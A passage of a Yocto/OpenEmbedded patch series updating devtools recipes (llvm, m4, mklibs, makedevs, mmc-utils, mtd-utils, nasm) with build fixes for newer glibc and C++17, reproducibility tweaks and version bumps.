+++ b/meta/recipes-devtools/llvm/llvm_git.bb
@@ -30,10 +30,11 @@ LLVM_DIR = "llvm${LLVM_RELEASE}"
BRANCH = "release/${MAJOR_VERSION}.x"
SRCREV = "c1a0a213378a458fbea1a5c77b315c7dce08fd05"
-SRC_URI = "git://github.com/llvm/llvm-project.git;branch=${BRANCH} \
+SRC_URI = "git://github.com/llvm/llvm-project.git;branch=${BRANCH};protocol=https \
file://0006-llvm-TargetLibraryInfo-Undefine-libc-functions-if-th.patch;striplevel=2 \
file://0007-llvm-allow-env-override-of-exe-path.patch;striplevel=2 \
- "
+ file://0001-AsmMatcherEmitter-sort-ClassInfo-lists-by-name-as-we.patch;striplevel=2 \
+ "
UPSTREAM_CHECK_GITTAGREGEX = "llvmorg-(?P<pver>\d+(\.\d+)+)"
@@ -101,6 +102,11 @@ do_configure_prepend() {
sed -ri "s#lib/${LLVM_DIR}#${baselib}/${LLVM_DIR}#g" ${S}/tools/llvm-config/llvm-config.cpp
}
+# patch out build host paths for reproducibility
+do_compile_prepend_class-target() {
+ sed -i -e "s,${WORKDIR},,g" ${B}/tools/llvm-config/BuildVariables.inc
+}
+
do_compile() {
ninja -v ${PARALLEL_MAKE}
}
diff --git a/meta/recipes-devtools/m4/m4-1.4.18.inc b/meta/recipes-devtools/m4/m4-1.4.18.inc
index a9b63c1bf6..6475b02f8b 100644
--- a/meta/recipes-devtools/m4/m4-1.4.18.inc
+++ b/meta/recipes-devtools/m4/m4-1.4.18.inc
@@ -9,6 +9,7 @@ inherit autotools texinfo ptest
SRC_URI = "${GNU_MIRROR}/m4/m4-${PV}.tar.gz \
file://ac_config_links.patch \
file://m4-1.4.18-glibc-change-work-around.patch \
+ file://0001-c-stack-stop-using-SIGSTKSZ.patch \
"
SRC_URI_append_class-target = " file://0001-Unset-need_charset_alias-when-building-for-musl.patch \
file://run-ptest \
diff --git a/meta/recipes-devtools/m4/m4/0001-c-stack-stop-using-SIGSTKSZ.patch b/meta/recipes-devtools/m4/m4/0001-c-stack-stop-using-SIGSTKSZ.patch
new file mode 100644
index 0000000000..883b8a2075
--- /dev/null
+++ b/meta/recipes-devtools/m4/m4/0001-c-stack-stop-using-SIGSTKSZ.patch
@@ -0,0 +1,84 @@
+From 69238f15129f35eb4756ad8e2004e0d7907cb175 Mon Sep 17 00:00:00 2001
+From: Khem Raj <raj.khem@gmail.com>
+Date: Fri, 30 Apr 2021 17:40:36 -0700
+Subject: [PATCH] c-stack: stop using SIGSTKSZ
+
+This patch is required with glibc 2.34+
+based on gnulib [1]
+
+[1] https://git.savannah.gnu.org/cgit/gnulib.git/commit/?id=f9e2b20a12a230efa30f1d479563ae07d276a94b
+
+Upstream-Status: Pending
+Signed-off-by: Khem Raj <raj.khem@gmail.com>
+---
+ lib/c-stack.c | 22 +++++++++++++---------
+ 1 file changed, 13 insertions(+), 9 deletions(-)
+
+diff --git a/lib/c-stack.c b/lib/c-stack.c
+index 5353c08..863f764 100644
+--- a/lib/c-stack.c
++++ b/lib/c-stack.c
+@@ -51,13 +51,14 @@
+ typedef struct sigaltstack stack_t;
+ #endif
+ #ifndef SIGSTKSZ
+-# define SIGSTKSZ 16384
+-#elif HAVE_LIBSIGSEGV && SIGSTKSZ < 16384
++#define get_sigstksz() (16384)
++#elif HAVE_LIBSIGSEGV
+ /* libsigsegv 2.6 through 2.8 have a bug where some architectures use
+ more than the Linux default of an 8k alternate stack when deciding
+ if a fault was caused by stack overflow. */
+-# undef SIGSTKSZ
+-# define SIGSTKSZ 16384
++#define get_sigstksz() ((SIGSTKSZ) < 16384 ? 16384 : (SIGSTKSZ))
++#else
++#define get_sigstksz() ((SIGSTKSZ))
+ #endif
+
+ #include <stdlib.h>
+@@ -131,7 +132,8 @@ die (int signo)
+ /* Storage for the alternate signal stack. */
+ static union
+ {
+- char buffer[SIGSTKSZ];
++ /* allocate buffer with size from get_sigstksz() */
++ char *buffer;
+
+ /* These other members are for proper alignment. There's no
+ standard way to guarantee stack alignment, but this seems enough
+@@ -203,10 +205,11 @@ c_stack_action (void (*action) (int))
+ program_error_message = _("program error");
+ stack_overflow_message = _("stack overflow");
+
++ alternate_signal_stack.buffer = malloc(get_sigstksz());
+ /* Always install the overflow handler. */
+ if (stackoverflow_install_handler (overflow_handler,
+ alternate_signal_stack.buffer,
+- sizeof alternate_signal_stack.buffer))
++ get_sigstksz()))
+ {
+ errno = ENOTSUP;
+ return -1;
+@@ -279,14 +282,15 @@ c_stack_action (void (*action) (int))
+ stack_t st;
+ struct sigaction act;
+ st.ss_flags = 0;
++ alternate_signal_stack.buffer = malloc(get_sigstksz());
+ # if SIGALTSTACK_SS_REVERSED
+ /* Irix mistakenly treats ss_sp as the upper bound, rather than
+ lower bound, of the alternate stack. */
+- st.ss_sp = alternate_signal_stack.buffer + SIGSTKSZ - sizeof (void *);
+- st.ss_size = sizeof alternate_signal_stack.buffer - sizeof (void *);
++ st.ss_sp = alternate_signal_stack.buffer + get_sigstksz() - sizeof (void *);
++ st.ss_size = get_sigstksz() - sizeof (void *);
+ # else
+ st.ss_sp = alternate_signal_stack.buffer;
+- st.ss_size = sizeof alternate_signal_stack.buffer;
++ st.ss_size = get_sigstksz();
+ # endif
+ r = sigaltstack (&st, NULL);
+ if (r != 0)
+--
+2.31.1
+
diff --git a/meta/recipes-devtools/makedevs/makedevs_1.0.1.bb b/meta/recipes-devtools/makedevs/makedevs_1.0.1.bb
index 92d5870f42..5910f4bc70 100644
--- a/meta/recipes-devtools/makedevs/makedevs_1.0.1.bb
+++ b/meta/recipes-devtools/makedevs/makedevs_1.0.1.bb
@@ -1,4 +1,5 @@
SUMMARY = "Tool for creating device nodes"
+DESCRIPTION = "${SUMMARY}"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://COPYING;md5=393a5ca445f6965873eca0259a17f833"
SECTION = "base"
diff --git a/meta/recipes-devtools/mklibs/files/remove-deprecated-exception-specification-cpp17.patch b/meta/recipes-devtools/mklibs/files/remove-deprecated-exception-specification-cpp17.patch
new file mode 100644
index 0000000000..f96cc7d302
--- /dev/null
+++ b/meta/recipes-devtools/mklibs/files/remove-deprecated-exception-specification-cpp17.patch
@@ -0,0 +1,431 @@
+From 597c7a8333df84a87cc48fb8477b603ffbf372a6 Mon Sep 17 00:00:00 2001
+From: Andrej Valek <andrej.valek@siemens.com>
+Date: Mon, 23 Aug 2021 12:45:11 +0200
+Subject: [PATCH] feat(cpp17): remove deprecated exception specifications for
+ C++ 17
+
+Upstream-Status: Submitted [https://salsa.debian.org/installer-team/mklibs/-/merge_requests/2]
+
+based on: http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2016/p0003r5.html
+
+Signed-off-by: Andrej Valek <andrej.valek@siemens.com>
+---
+ src/mklibs-readelf/elf.cpp | 48 ++++++++++++++++++++---------------------
+ src/mklibs-readelf/elf.hpp | 18 ++++++++--------
+ src/mklibs-readelf/elf_data.hpp | 36 +++++++++++++++----------------
+ 3 files changed, 51 insertions(+), 51 deletions(-)
+
+diff --git a/src/mklibs-readelf/elf.cpp b/src/mklibs-readelf/elf.cpp
+index 0e4c0f3..2e6d0f6 100644
+--- a/src/mklibs-readelf/elf.cpp
++++ b/src/mklibs-readelf/elf.cpp
+@@ -36,7 +36,7 @@ file::~file () throw ()
+ delete *it;
+ }
+
+-file *file::open (const char *filename) throw (std::bad_alloc, std::runtime_error)
++file *file::open (const char *filename) throw ()
+ {
+ struct stat buf;
+ int fd;
+@@ -72,7 +72,7 @@ file *file::open (const char *filename) throw (std::bad_alloc, std::runtime_erro
+ }
+
+ template<typename _class>
+-file *file::open_class(uint8_t *mem, size_t len) throw (std::bad_alloc, std::runtime_error)
++file *file::open_class(uint8_t *mem, size_t len) throw ()
+ {
+ switch (mem[EI_DATA])
+ {
+@@ -86,7 +86,7 @@ file *file::open_class(uint8_t *mem, size_t len) throw (std::bad_alloc, std::run
+ }
+
+ template <typename _class, typename _data>
+-file_data<_class, _data>::file_data(uint8_t *mem, size_t len) throw (std::bad_alloc, std::runtime_error)
++file_data<_class, _data>::file_data(uint8_t *mem, size_t len) throw ()
+ : file(mem, len)
+ {
+ if (mem[EI_CLASS] != _class::id)
+@@ -190,7 +190,7 @@ section_data<_class, _data>::section_data(Shdr *shdr, uint8_t *mem) throw ()
+ }
+
+ template <typename _class, typename _data>
+-void section_data<_class, _data>::update(const file &file) throw (std::bad_alloc)
++void section_data<_class, _data>::update(const file &file) throw ()
+ {
+ const section_type<section_type_STRTAB> &section =
+ dynamic_cast<const section_type<section_type_STRTAB> &>(file.get_section(file.get_shstrndx()));
+@@ -204,7 +204,7 @@ section_type<section_type_DYNAMIC>::~section_type() throw ()
+ }
+
+ template <typename _class, typename _data>
+-section_real<_class, _data, section_type_DYNAMIC>::section_real(Shdr *header, uint8_t *mem) throw (std::bad_alloc)
++section_real<_class, _data, section_type_DYNAMIC>::section_real(Shdr *header, uint8_t *mem) throw ()
+ : section_data<_class, _data>(header, mem)
+ {
+ if (this->type != SHT_DYNAMIC)
+@@ -221,7 +221,7 @@ section_real<_class, _data, section_type_DYNAMIC>::section_real(Shdr *header, ui
+ }
+
+ template <typename _class, typename _data>
+-void section_real<_class, _data, section_type_DYNAMIC>::update(const file &file) throw (std::bad_alloc)
++void section_real<_class, _data, section_type_DYNAMIC>::update(const file &file) throw ()
+ {
+ section_data<_class, _data>::update(file);
+
+@@ -243,7 +243,7 @@ section_type<section_type_DYNSYM>::~section_type() throw ()
+ }
+
+ template <typename _class, typename _data>
+-section_real<_class, _data, section_type_DYNSYM>::section_real(Shdr *header, uint8_t *mem) throw (std::bad_alloc)
++section_real<_class, _data, section_type_DYNSYM>::section_real(Shdr *header, uint8_t *mem) throw ()
+ : section_data<_class, _data>(header, mem)
+ {
+ if (this->type != SHT_DYNSYM)
+@@ -260,7 +260,7 @@ section_real<_class, _data, section_type_DYNSYM>::section_real(Shdr *header, uin
+ }
+
+ template <typename _class, typename _data>
+-void section_real<_class, _data, section_type_DYNSYM>::update(const file &file) throw (std::bad_alloc)
++void section_real<_class, _data, section_type_DYNSYM>::update(const file &file) throw ()
+ {
+ section_data<_class, _data>::update (file);
+
+@@ -285,7 +285,7 @@ const version_definition *section_type<section_type_GNU_VERDEF>::get_version_def
+ }
+
+ template <typename _class, typename _data>
+-section_real<_class, _data, section_type_GNU_VERDEF>::section_real(Shdr *header, uint8_t *mem) throw (std::bad_alloc)
++section_real<_class, _data, section_type_GNU_VERDEF>::section_real(Shdr *header, uint8_t *mem) throw ()
+ : section_data<_class, _data>(header, mem)
+ {
+ if (this->type != SHT_GNU_verdef)
+@@ -307,7 +307,7 @@ section_real<_class, _data, section_type_GNU_VERDEF>::section_real(Shdr *header,
+ }
+
+ template <typename _class, typename _data>
+-void section_real<_class, _data, section_type_GNU_VERDEF>::update(const file &file) throw (std::bad_alloc)
++void section_real<_class, _data, section_type_GNU_VERDEF>::update(const file &file) throw ()
+ {
+ section_data<_class, _data>::update(file);
+
+@@ -333,7 +333,7 @@ const version_requirement_entry *section_type<section_type_GNU_VERNEED>::get_ver
+
+ template <typename _class, typename _data>
+ section_real<_class, _data, section_type_GNU_VERNEED>::
+-section_real(Shdr *header, uint8_t *mem) throw (std::bad_alloc)
++section_real(Shdr *header, uint8_t *mem) throw ()
+ : section_data<_class, _data> (header, mem)
+ {
+ if (this->type != SHT_GNU_verneed)
+@@ -355,7 +355,7 @@ section_real(Shdr *header, uint8_t *mem) throw (std::bad_alloc)
+ }
+
+ template <typename _class, typename _data>
+-void section_real<_class, _data, section_type_GNU_VERNEED>::update(const file &file) throw (std::bad_alloc)
++void section_real<_class, _data, section_type_GNU_VERNEED>::update(const file &file) throw ()
+ {
+ section_data<_class, _data>::update(file);
+
+@@ -372,7 +372,7 @@ void section_real<_class, _data, section_type_GNU_VERNEED>::update(const file &f
+
+ template <typename _class, typename _data>
+ section_real<_class, _data, section_type_GNU_VERSYM>::
+-section_real (Shdr *header, uint8_t *mem) throw (std::bad_alloc)
++section_real (Shdr *header, uint8_t *mem) throw ()
+ : section_data<_class, _data> (header, mem)
+ {
+ if (this->type != SHT_GNU_versym)
+@@ -399,7 +399,7 @@ segment_data<_class, _data>::segment_data (Phdr *phdr, uint8_t *mem) throw ()
+ }
+
+ template <typename _class, typename _data>
+-segment_real<_class, _data, segment_type_INTERP>::segment_real (Phdr *header, uint8_t *mem) throw (std::bad_alloc)
++segment_real<_class, _data, segment_type_INTERP>::segment_real (Phdr *header, uint8_t *mem) throw ()
+ : segment_data<_class, _data> (header, mem)
+ {
+ if (this->type != PT_INTERP)
+@@ -429,13 +429,13 @@ dynamic_data<_class, _data>::dynamic_data (Dyn *dyn) throw ()
+ }
+
+ template <typename _class, typename _data>
+-void dynamic_data<_class, _data>::update_string(const section_type<section_type_STRTAB> &section) throw (std::bad_alloc)
++void dynamic_data<_class, _data>::update_string(const section_type<section_type_STRTAB> &section) throw ()
+ {
+ if (is_string)
+ val_string = section.get_string(val);
+ }
+
+-std::string symbol::get_version () const throw (std::bad_alloc)
++std::string symbol::get_version () const throw ()
+ {
+ if (verneed)
+ return verneed->get_name();
+@@ -445,7 +445,7 @@ std::string symbol::get_version () const throw (std::bad_alloc)
+ return "Base";
+ }
+
+-std::string symbol::get_version_file () const throw (std::bad_alloc)
++std::string symbol::get_version_file () const throw ()
+ {
+ if (verneed)
+ return verneed->get_file();
+@@ -453,7 +453,7 @@ std::string symbol::get_version_file () const throw (std::bad_alloc)
+ return "None";
+ }
+
+-std::string symbol::get_name_version () const throw (std::bad_alloc)
++std::string symbol::get_name_version () const throw ()
+ {
+ std::string ver;
+
+@@ -478,13 +478,13 @@ symbol_data<_class, _data>::symbol_data (Sym *sym) throw ()
+ }
+
+ template <typename _class, typename _data>
+-void symbol_data<_class, _data>::update_string(const section_type<section_type_STRTAB> &section) throw (std::bad_alloc)
++void symbol_data<_class, _data>::update_string(const section_type<section_type_STRTAB> &section) throw ()
+ {
+ name_string = section.get_string(name);
+ }
+
+ template <typename _class, typename _data>
+-void symbol_data<_class, _data>::update_version(const file &file, uint16_t index) throw (std::bad_alloc)
++void symbol_data<_class, _data>::update_version(const file &file, uint16_t index) throw ()
+ {
+ if (!file.get_section_GNU_VERSYM())
+ return;
+@@ -531,13 +531,13 @@ version_definition_data<_class, _data>::version_definition_data (Verdef *verdef)
+ }
+
+ template <typename _class, typename _data>
+-void version_definition_data<_class, _data>::update_string(const section_type<section_type_STRTAB> &section) throw (std::bad_alloc)
++void version_definition_data<_class, _data>::update_string(const section_type<section_type_STRTAB> &section) throw ()
+ {
+ for (std::vector<uint32_t>::iterator it = names.begin(); it != names.end(); ++it)
+ names_string.push_back(section.get_string(*it));
+ }
+
+-version_requirement::version_requirement() throw (std::bad_alloc)
++version_requirement::version_requirement() throw ()
+ : file_string("None")
+ { }
+
+@@ -561,7 +561,7 @@ version_requirement_data<_class, _data>::version_requirement_data (Verneed *vern
+
+ template <typename _class, typename _data>
+ void version_requirement_data<_class, _data>::
+-update_string(const section_type<section_type_STRTAB> &section) throw (std::bad_alloc)
++update_string(const section_type<section_type_STRTAB> &section) throw ()
+ {
+ file_string = section.get_string(file);
+
+@@ -596,7 +596,7 @@ version_requirement_entry_data(Vernaux *vna, const version_requirement &verneed)
+
+ template <typename _class, typename _data>
+ void version_requirement_entry_data<_class, _data>::
+-update_string(const section_type<section_type_STRTAB> &section) throw (std::bad_alloc)
++update_string(const section_type<section_type_STRTAB> &section) throw ()
+ {
+ name_string = section.get_string(name);
+ }
+diff --git a/src/mklibs-readelf/elf.hpp b/src/mklibs-readelf/elf.hpp
+index 70e61cd..afb0c9e 100644
+--- a/src/mklibs-readelf/elf.hpp
++++ b/src/mklibs-readelf/elf.hpp
+@@ -49,7 +49,7 @@ namespace Elf
+ const uint16_t get_shstrndx() const throw () { return shstrndx; }
+
+ const std::vector<section *> get_sections() const throw () { return sections; };
+- const section &get_section(unsigned int i) const throw (std::out_of_range) { return *sections.at(i); };
++ const section &get_section(unsigned int i) const throw () { return *sections.at(i); };
+ const section_type<section_type_DYNAMIC> *get_section_DYNAMIC() const throw () { return section_DYNAMIC; };
+ const section_type<section_type_DYNSYM> *get_section_DYNSYM() const throw () { return section_DYNSYM; };
+ const section_type<section_type_GNU_VERDEF> *get_section_GNU_VERDEF() const throw () { return section_GNU_VERDEF; };
+@@ -59,13 +59,13 @@ namespace Elf
+ const std::vector<segment *> get_segments() const throw () { return segments; };
+ const segment_type<segment_type_INTERP> *get_segment_INTERP() const throw () { return segment_INTERP; };
+
+- static file *open(const char *filename) throw (std::bad_alloc, std::runtime_error);
++ static file *open(const char *filename) throw ();
+
+ protected:
+- file(uint8_t *mem, size_t len) throw (std::bad_alloc) : mem(mem), len(len) { }
++ file(uint8_t *mem, size_t len) throw () : mem(mem), len(len) { }
+
+ template<typename _class>
+- static file *open_class(uint8_t *, size_t) throw (std::bad_alloc, std::runtime_error);
++ static file *open_class(uint8_t *, size_t) throw ();
+
+ uint16_t type;
+ uint16_t machine;
+@@ -128,7 +128,7 @@ namespace Elf
+ class section_type<section_type_STRTAB> : public virtual section
+ {
+ public:
+- std::string get_string(uint32_t offset) const throw (std::bad_alloc)
++ std::string get_string(uint32_t offset) const throw ()
+ {
+ return std::string(reinterpret_cast<const char *> (mem + offset));
+ }
+@@ -263,10 +263,10 @@ namespace Elf
+ uint8_t get_bind () const throw () { return bind; }
+ uint8_t get_type () const throw () { return type; }
+ const std::string &get_name_string() const throw () { return name_string; }
+- std::string get_version() const throw (std::bad_alloc);
+- std::string get_version_file() const throw (std::bad_alloc);
++ std::string get_version() const throw ();
++ std::string get_version_file() const throw ();
+ uint16_t get_version_data() const throw () { return versym; }
+- std::string get_name_version() const throw (std::bad_alloc);
++ std::string get_name_version() const throw ();
+
+ protected:
+ uint32_t name;
+@@ -305,7 +305,7 @@ namespace Elf
+ class version_requirement
+ {
+ public:
+- version_requirement() throw (std::bad_alloc);
++ version_requirement() throw ();
+ virtual ~version_requirement () throw () { }
+
+ const std::string &get_file() const throw () { return file_string; }
+diff --git a/src/mklibs-readelf/elf_data.hpp b/src/mklibs-readelf/elf_data.hpp
+index 05effee..3871982 100644
+--- a/src/mklibs-readelf/elf_data.hpp
++++ b/src/mklibs-readelf/elf_data.hpp
+@@ -94,7 +94,7 @@ namespace Elf
+ class file_data : public file
+ {
+ public:
+- file_data(uint8_t *, size_t len) throw (std::bad_alloc, std::runtime_error);
++ file_data(uint8_t *, size_t len) throw ();
+
+ const uint8_t get_class() const throw () { return _class::id; }
+ const uint8_t get_data() const throw () { return _data::id; }
+@@ -109,7 +109,7 @@ namespace Elf
+ public:
+ section_data(Shdr *, uint8_t *) throw ();
+
+- virtual void update(const file &) throw (std::bad_alloc);
++ virtual void update(const file &) throw ();
+ };
+
+ template <typename _class, typename _data, typename _type>
+@@ -133,9 +133,9 @@ namespace Elf
+ typedef typename _elfdef<_class>::Shdr Shdr;
+
+ public:
+- section_real(Shdr *, uint8_t *) throw (std::bad_alloc);
++ section_real(Shdr *, uint8_t *) throw ();
+
+- void update(const file &) throw (std::bad_alloc);
++ void update(const file &) throw ();
+ };
+
+ template <typename _class, typename _data>
+@@ -147,9 +147,9 @@ namespace Elf
+ typedef typename _elfdef<_class>::Shdr Shdr;
+
+ public:
+- section_real(Shdr *, uint8_t *) throw (std::bad_alloc);
++ section_real(Shdr *, uint8_t *) throw ();
+
+- void update(const file &) throw (std::bad_alloc);
++ void update(const file &) throw ();
+ };
+
+ template <typename _class, typename _data>
+@@ -161,9 +161,9 @@ namespace Elf
+ typedef typename _elfdef<_class>::Shdr Shdr;
+
+ public:
+- section_real(Shdr *, uint8_t *) throw (std::bad_alloc);
++ section_real(Shdr *, uint8_t *) throw ();
+
+- void update(const file &) throw (std::bad_alloc);
++ void update(const file &) throw ();
+ };
+
+ template <typename _class, typename _data>
+@@ -175,9 +175,9 @@ namespace Elf
+ typedef typename _elfdef<_class>::Shdr Shdr;
+
+ public:
+- section_real(Shdr *, uint8_t *) throw (std::bad_alloc);
++ section_real(Shdr *, uint8_t *) throw ();
+
+- void update(const file &) throw (std::bad_alloc);
++ void update(const file &) throw ();
+ };
+
+ template <typename _class, typename _data>
+@@ -189,7 +189,7 @@ namespace Elf
+ typedef typename _elfdef<_class>::Shdr Shdr;
+
+ public:
+- section_real(Shdr *, uint8_t *) throw (std::bad_alloc);
++ section_real(Shdr *, uint8_t *) throw ();
+ };
+
+ template <typename _class, typename _data>
+@@ -220,7 +220,7 @@ namespace Elf
+ typedef typename _elfdef<_class>::Phdr Phdr;
+
+ public:
+- segment_real (Phdr *, uint8_t *) throw (std::bad_alloc);
++ segment_real (Phdr *, uint8_t *) throw ();
+ };
+
+ template <typename _class, typename _data>
+@@ -232,7 +232,7 @@ namespace Elf
+ public:
+ dynamic_data (Dyn *) throw ();
+
+- void update_string(const section_type<section_type_STRTAB> &) throw (std::bad_alloc);
++ void update_string(const section_type<section_type_STRTAB> &) throw ();
+ };
+
+ template <typename _class, typename _data>
+@@ -244,8 +244,8 @@ namespace Elf
+ public:
+ symbol_data (Sym *) throw ();
+
+- void update_string(const section_type<section_type_STRTAB> &) throw (std::bad_alloc);
+- virtual void update_version (const file &, uint16_t) throw (std::bad_alloc);
++ void update_string(const section_type<section_type_STRTAB> &) throw ();
++ virtual void update_version (const file &, uint16_t) throw ();
+ };
+
+ template <typename _class, typename _data>
+@@ -257,7 +257,7 @@ namespace Elf
+
+ version_definition_data (Verdef *) throw ();
+
+- void update_string(const section_type<section_type_STRTAB> &) throw (std::bad_alloc);
++ void update_string(const section_type<section_type_STRTAB> &) throw ();
+ };
+
+ template <typename _class, typename _data>
+@@ -269,7 +269,7 @@ namespace Elf
+
+ version_requirement_data (Verneed *) throw ();
+
+- void update_string(const section_type<section_type_STRTAB> &) throw (std::bad_alloc);
++ void update_string(const section_type<section_type_STRTAB> &) throw ();
+ };
+
+ template <typename _class, typename _data>
+@@ -280,7 +280,7 @@ namespace Elf
+
+ version_requirement_entry_data (Vernaux *, const version_requirement &) throw ();
+
+- void update_string(const section_type<section_type_STRTAB> &) throw (std::bad_alloc);
++ void update_string(const section_type<section_type_STRTAB> &) throw ();
+ };
+ }
+
+--
+2.11.0
+
diff --git a/meta/recipes-devtools/mklibs/mklibs-native_0.1.44.bb b/meta/recipes-devtools/mklibs/mklibs-native_0.1.44.bb
index 1784af1f4c..07142e57e0 100644
--- a/meta/recipes-devtools/mklibs/mklibs-native_0.1.44.bb
+++ b/meta/recipes-devtools/mklibs/mklibs-native_0.1.44.bb
@@ -12,6 +12,7 @@ SRC_URI = "http://snapshot.debian.org/archive/debian/20180828T214102Z/pool/main/
file://avoid-failure-on-symbol-provided-by-application.patch \
file://show-GNU-unique-symbols-as-provided-symbols.patch \
file://fix_cross_compile.patch \
+ file://remove-deprecated-exception-specification-cpp17.patch \
"
SRC_URI[md5sum] = "6b6eeb9b4016c6a7317acc28c89e32cc"
diff --git a/meta/recipes-devtools/mmc/mmc-utils_git.bb b/meta/recipes-devtools/mmc/mmc-utils_git.bb
index 5fd1c5c0cd..8fe606915e 100644
--- a/meta/recipes-devtools/mmc/mmc-utils_git.bb
+++ b/meta/recipes-devtools/mmc/mmc-utils_git.bb
@@ -1,5 +1,6 @@
SUMMARY = "Userspace tools for MMC/SD devices"
HOMEPAGE = "http://git.kernel.org/cgit/linux/kernel/git/cjb/mmc-utils.git/"
+DESCRIPTION = "${SUMMARY}"
LICENSE = "GPLv2"
LIC_FILES_CHKSUM = "file://mmc.c;beginline=1;endline=20;md5=fae32792e20f4d27ade1c5a762d16b7d"
diff --git a/meta/recipes-devtools/mtd/mtd-utils/0001-mtd-utils-Fix-return-value-of-ubiformat.patch b/meta/recipes-devtools/mtd/mtd-utils/0001-mtd-utils-Fix-return-value-of-ubiformat.patch
deleted file mode 100644
index d43f7e1a7a..0000000000
--- a/meta/recipes-devtools/mtd/mtd-utils/0001-mtd-utils-Fix-return-value-of-ubiformat.patch
+++ /dev/null
@@ -1,62 +0,0 @@
-From 4d19bffcfd66e25d3ee74536ae2d2da7ad52e8e2 Mon Sep 17 00:00:00 2001
-From: Barry Grussling <barry@grussling.com>
-Date: Sun, 12 Jan 2020 12:33:32 -0800
-Subject: [PATCH] mtd-utils: Fix return value of ubiformat
-Organization: O.S. Systems Software LTDA.
-
-This changeset fixes a feature regression in ubiformat. Older versions of
-ubiformat, when invoked with a flash-image, would return 0 in the case no error
-was encountered. Upon upgrading to latest, it was discovered that ubiformat
-returned 255 even without encountering an error condition.
-
-This changeset corrects the above issue and causes ubiformat, when given an
-image file, to return 0 when no errors are detected.
-
-Tested by running through my loading scripts and verifying ubiformat returned
-0.
-
-Upstream-Status: Backport [2.1.2]
-
-Signed-off-by: Barry Grussling <barry@grussling.com>
-Signed-off-by: David Oberhollenzer <david.oberhollenzer@sigma-star.at>
-Signed-off-by: Otavio Salvador <otavio@ossystems.com.br>
----
- ubi-utils/ubiformat.c | 7 +++++--
- 1 file changed, 5 insertions(+), 2 deletions(-)
-
-diff --git a/ubi-utils/ubiformat.c b/ubi-utils/ubiformat.c
-index a90627c..5377b12 100644
---- a/ubi-utils/ubiformat.c
-+++ b/ubi-utils/ubiformat.c
-@@ -550,6 +550,7 @@ static int format(libmtd_t libmtd, const struct mtd_dev_info *mtd,
- struct ubi_vtbl_record *vtbl;
- int eb1 = -1, eb2 = -1;
- long long ec1 = -1, ec2 = -1;
-+ int ret = -1;
-
- write_size = UBI_EC_HDR_SIZE + mtd->subpage_size - 1;
- write_size /= mtd->subpage_size;
-@@ -643,8 +644,10 @@ static int format(libmtd_t libmtd, const struct mtd_dev_info *mtd,
- if (!args.quiet && !args.verbose)
- printf("\n");
-
-- if (novtbl)
-+ if (novtbl) {
-+ ret = 0;
- goto out_free;
-+ }
-
- if (eb1 == -1 || eb2 == -1) {
- errmsg("no eraseblocks for volume table");
-@@ -669,7 +672,7 @@ static int format(libmtd_t libmtd, const struct mtd_dev_info *mtd,
-
- out_free:
- free(hdr);
-- return -1;
-+ return ret;
- }
-
- int main(int argc, char * const argv[])
---
-2.27.0
-
diff --git a/meta/recipes-devtools/mtd/mtd-utils_git.bb b/meta/recipes-devtools/mtd/mtd-utils_git.bb
index d1658a739b..fa42770ee4 100644
--- a/meta/recipes-devtools/mtd/mtd-utils_git.bb
+++ b/meta/recipes-devtools/mtd/mtd-utils_git.bb
@@ -1,5 +1,6 @@
SUMMARY = "Tools for managing memory technology devices"
HOMEPAGE = "http://www.linux-mtd.infradead.org/"
+DESCRIPTION = "mtd-utils tool is a generic Linux subsystem for memory devices, especially Flash devices."
SECTION = "base"
LICENSE = "GPLv2+"
LIC_FILES_CHKSUM = "file://COPYING;md5=0636e73ff0215e8d672dc4c32c317bb3 \
@@ -10,18 +11,15 @@ inherit autotools pkgconfig update-alternatives
DEPENDS = "zlib e2fsprogs util-linux"
RDEPENDS_mtd-utils-tests += "bash"
-PV = "2.1.1"
+PV = "2.1.3"
-SRCREV = "4443221ce9b88440cd9f5bb78e6fe95621d36c8a"
-SRC_URI = "git://git.infradead.org/mtd-utils.git \
+SRCREV = "42ea7cd48d2b3c306d59bb6c530d79f8c25bf9f5"
+SRC_URI = "git://git.infradead.org/mtd-utils.git;branch=master \
file://add-exclusion-to-mkfs-jffs2-git-2.patch \
- file://0001-mtd-utils-Fix-return-value-of-ubiformat.patch \
-"
+ "
S = "${WORKDIR}/git/"
-EXTRA_OECONF += "--enable-install-tests"
-
# xattr support creates an additional compile-time dependency on acl because
# the sys/acl.h header is needed. libacl is not needed and thus enabling xattr
# regardless whether acl is enabled or disabled in the distro should be okay.
@@ -43,11 +41,9 @@ ALTERNATIVE_PRIORITY = "100"
ALTERNATIVE_${PN} = "flashcp flash_eraseall flash_lock flash_unlock nanddump nandwrite"
ALTERNATIVE_${PN}-ubifs = "ubiattach ubidetach ubimkvol ubirename ubirmvol ubirsvol ubiupdatevol"
-ALTERNATIVE_LINK_NAME[flash_eraseall] = "${sbindir}/flash_eraseall"
ALTERNATIVE_LINK_NAME[nandwrite] = "${sbindir}/nandwrite"
ALTERNATIVE_LINK_NAME[nanddump] = "${sbindir}/nanddump"
ALTERNATIVE_LINK_NAME[ubiattach] = "${sbindir}/ubiattach"
-ALTERNATIVE_LINK_NAME[ubiattach] = "${sbindir}/ubiattach"
ALTERNATIVE_LINK_NAME[ubidetach] = "${sbindir}/ubidetach"
ALTERNATIVE_LINK_NAME[ubimkvol] = "${sbindir}/ubimkvol"
ALTERNATIVE_LINK_NAME[ubirename] = "${sbindir}/ubirename"
diff --git a/meta/recipes-devtools/nasm/nasm/0002-Add-debug-prefix-map-option.patch b/meta/recipes-devtools/nasm/nasm/0002-Add-debug-prefix-map-option.patch
index f788e0fd43..9f4c8dc0bd 100644
--- a/meta/recipes-devtools/nasm/nasm/0002-Add-debug-prefix-map-option.patch
+++ b/meta/recipes-devtools/nasm/nasm/0002-Add-debug-prefix-map-option.patch
@@ -1,4 +1,4 @@
-From bb4e42ad3a0cdd23a1d1797e6299c76b474867c0 Mon Sep 17 00:00:00 2001
+From 81d6519499dcfebe7d21e65e002a8885a4e8d852 Mon Sep 17 00:00:00 2001
From: Joshua Watt <JPEWhacker@gmail.com>
Date: Tue, 19 Nov 2019 13:12:17 -0600
Subject: [PATCH] Add --debug-prefix-map option
@@ -11,7 +11,7 @@ Upstream-Status: Submitted [https://bugzilla.nasm.us/show_bug.cgi?id=3392635]
Signed-off-by: Joshua Watt <JPEWhacker@gmail.com>
---
- asm/nasm.c | 26 +++++++++++++++++++++++++-
+ asm/nasm.c | 24 ++++++++++++++++++++++++
include/nasmlib.h | 9 +++++++++
nasm.txt | 4 ++++
